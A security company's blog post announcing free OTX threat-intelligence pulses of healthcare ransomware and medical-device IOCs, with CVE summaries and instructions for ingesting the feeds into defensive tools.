Free Threat Intel for Minnesota Healthcare: 60 IOCs You Can Block Today

TL;DR: We just published 3 OTX pulses with 60 healthcare-specific IOCs covering Interlock, Akira, RansomHub, and ALPHV/BlackCat. Free. No paywall. Subscribe and block.

The Problem

The FBI says healthcare ransomware attacks are up 400% in 2025. Health-ISAC documented 458 incidents in 2024 alone. The Change Healthcare attack left millions unable to pay for medications. The Ascension attack hit 140 hospitals and 40 senior care facilities.

Meanwhile, most threat intel costs $50K-$200K/year and sits behind sales calls.

The Solution

We built three OTX pulses specifically for healthcare defenders. Sixty indicators of compromise. Zero cost. Subscribe with a free AlienVault account and start blocking.

Pulse 1: FDA 510(k) Medical Device Security **26 IOCs** | [Subscribe](https://otx.alienvault.com/pulse/692c9d81b4e8f82f6d98e1c6)

Eleven CVEs affecting devices from manufacturers you have in your facilities right now:

| Manufacturer | CVE | Device | CVSS | |--------------|-----|--------|------| | Contec | CVE-2025-0683 | CMS8000 Patient Monitor | FDA recommends removal | | Medtronic | CVE-2025-29997 | MyCareLink | Auth bypass | | Philips | CVE-2025-2229 | IntelliSpace Cardiovascular | Path traversal | | GE Healthcare | CVE-2024-27107 | Ultrasound | 9.6 Critical | | BD | CVE-2024-12248 | BACTEC | Buffer overflow | | Siemens | CVE-2024-37999 | Medicalis | Multiple |

If you have Contec CMS8000 patient monitors, the FDA literally recommends removing them from your network. That's not FUD—that's the federal government telling you to unplug.

Pulse 2: Healthcare Ransomware - RansomHub + ALPHV/BlackCat **15 IOCs** | [Subscribe](https://otx.alienvault.com/pulse/692cae3412d41ee40eda7e11)

The crews behind the Change Healthcare and Ascension attacks. C2 IPs, payload servers, and the CVEs they exploit for initial access:

• CVE-2023-3519 - Citrix ADC (RansomHub initial access)

• CVE-2024-1709 - ScreenConnect auth bypass (Change Healthcare breach vector)

• CVE-2023-27997 - FortiOS SSL-VPN (RansomHub)

DragonForce absorbed RansomHub in March 2025. Same playbook, new brand.

Pulse 3: Healthcare Ransomware Master - Interlock + Akira **19 IOCs** | [Subscribe](https://otx.alienvault.com/pulse/692cb21533f7235662d8bf2e)

The 2025 threats. CISA released AA25-203A (Interlock) in July and updated AA24-109A (Akira) in November. We extracted the file hashes and CVEs so you don't have to parse PDFs.

Interlock uses ClickFix social engineering—fake CAPTCHAs that execute PowerShell. They're explicitly targeting healthcare.

Akira exploits VPNs without MFA. If you have Cisco ASA, SonicWall, or Veeam without multi-factor, you're on their menu.

Hashes included for both encryptors and their supporting tools (SystemBC cleanup, Lumma stealer, Cobalt Strike).

Why Free?

Because Minnesota healthcare is critical infrastructure. Mayo Clinic, Children's Minnesota, Fairview, Allina—these organizations protect our community. Threat intel shouldn't be a profit center that prices out the defenders who need it most.

We make money on consulting and enterprise features. The IOCs are table stakes.

How to Use This

Option 1: OTX Subscription (Easiest) 1. Create free AlienVault OTX account 2. Subscribe to our pulses 3. Your SIEM ingests automatically if you have OTX integration

Option 2: STIX 2.1 Feed (For the Technical) ``` https://analytics.dugganusa.com/api/v1/stix-feed ``` Machine-readable. Ingest into Splunk, QRadar, Sentinel, whatever you run.

Option 3: Manual Block List (For the Scrappy) Pull the IPs and hashes from the pulse. Add to firewall rules. Better than nothing.

The Uncomfortable Truth

Most of you reading this know someone at a hospital that's been hit. Maybe you've been hit yourself. The attackers share IOCs freely on dark web forums. Why don't we share defense freely on the regular web?

Health-ISAC does great work, but membership costs money. CISA publishes advisories, but who has time to parse government PDFs? We're trying to close the gap.

60 IOCs. 3 pulses. Zero excuses.

Resources

• [DugganUSA OTX Profile](https://otx.alienvault.com/user/pduggusa) - 1,134+ total indicators

• [STIX Feed](https://analytics.dugganusa.com/api/v1/stix-feed) - Machine-readable

• [CISA AA25-203A](https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a) - Interlock advisory

• [CISA AA24-109A](https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-109a) - Akira advisory

• [Health-ISAC 2025 Report](https://health-isac.org/wp-content/uploads/Health-ISAC_2025-Annual-Threat-Report.pdf) - Industry threat landscape

*Patrick Duggan is founder of DugganUSA, a Minnesota-based security company. He believes threat intel should be shared, mistakes should be admitted publicly, and healthcare defenders deserve better than sales calls.*

*Questions? Reach out: [email protected]*

Get Free IOCs

Subscribe to our threat intelligence feeds for free, machine-readable IOCs:

AlienVault OTX: https://otx.alienvault.com/user/pduggusa

STIX 2.1 Feed: https://analytics.dugganusa.com/api/v1/stix-feed

Questions? [email protected]